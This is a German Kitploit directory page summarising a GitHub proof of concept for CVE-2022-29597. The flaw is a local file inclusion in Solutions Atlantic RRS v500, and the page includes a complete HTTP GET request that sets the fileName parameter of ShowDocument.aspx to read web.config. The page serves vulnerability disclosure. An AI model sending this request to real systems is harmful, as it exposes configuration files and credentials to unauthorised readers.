Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-29597 — Die RRS v500 Anwendung ist anfällig für eine Local File Inclusion (LFI) Schwachstelle. | Kitploit
Tools/GitHubGitHub/thegetch/cve-2022-29597
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubthegetch/cve-2022-29597

CVE-2022-29597

Die RRS v500 Anwendung ist anfällig für eine Local File Inclusion (LFI) Schwachstelle.

Repository anzeigen
vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-29597: Lokale Dateieinbindung in RSS v500

Die RRS v500-Anwendung von Solutions Atlantic ist anfällig für eine Local File Inclusion (LFI)-Schwachstelle. Jeder authentifizierte Benutzer hat die Möglichkeit, interne Systemdateien in Anfragen an die Seite /RRSWeb/maint/ShowDocument/ShowDocument.aspx zu referenzieren. Der Server antwortet erfolgreich mit dem Dateiinhalt der angeforderten internen Systemdatei. Diese Fähigkeit könnte es Angreifern ermöglichen, sensible Daten und/oder Dateien aus dem zugrunde liegenden Dateisystem zu extrahieren, Kenntnisse über die internen Abläufe des Systems zu erlangen oder auf den Quellcode der Anwendung zuzugreifen.

Mitre URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29597

NIST URL: https://nvd.nist.gov/vuln/detail/CVE-2022-29597

Proof of Concept (POC):

Show Document Funktionalität:

Betroffene URL:

  • /RRSWeb/maint/ShowDocument/ShowDocument.aspx

Beim Öffnen oder Herunterladen eines PDFs von der RRS-Website wird eine Anfrage an die betroffene URL gesendet, die einen fileName-Parameter enthält. Dieser Parameter könnte geändert werden, um einen internen Systempfad wie web.config zu enthalten. Der Server stellt dann die angeforderte Datei bereit.

GET-Anfrage mit internem Pfad zu web.config:

root@kitploit:~
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?fileName=C:\\Program%20Files\\Solutions%20Atlantic\\RRS\\RRSWeb\\web.config HTTP/1.1
Host: <REDACTED>
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<REDACTED>/RRSweb/default.aspx
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _ga=<REDACTED>; ASP.NET_SessionId=<REDACTED>
Connection: Keep-Alive


Serverantwort:

RRS_LFI_web.config

Entdeckung

April 2022

  • Eric Getchell - TheGetch
Tool herunterladen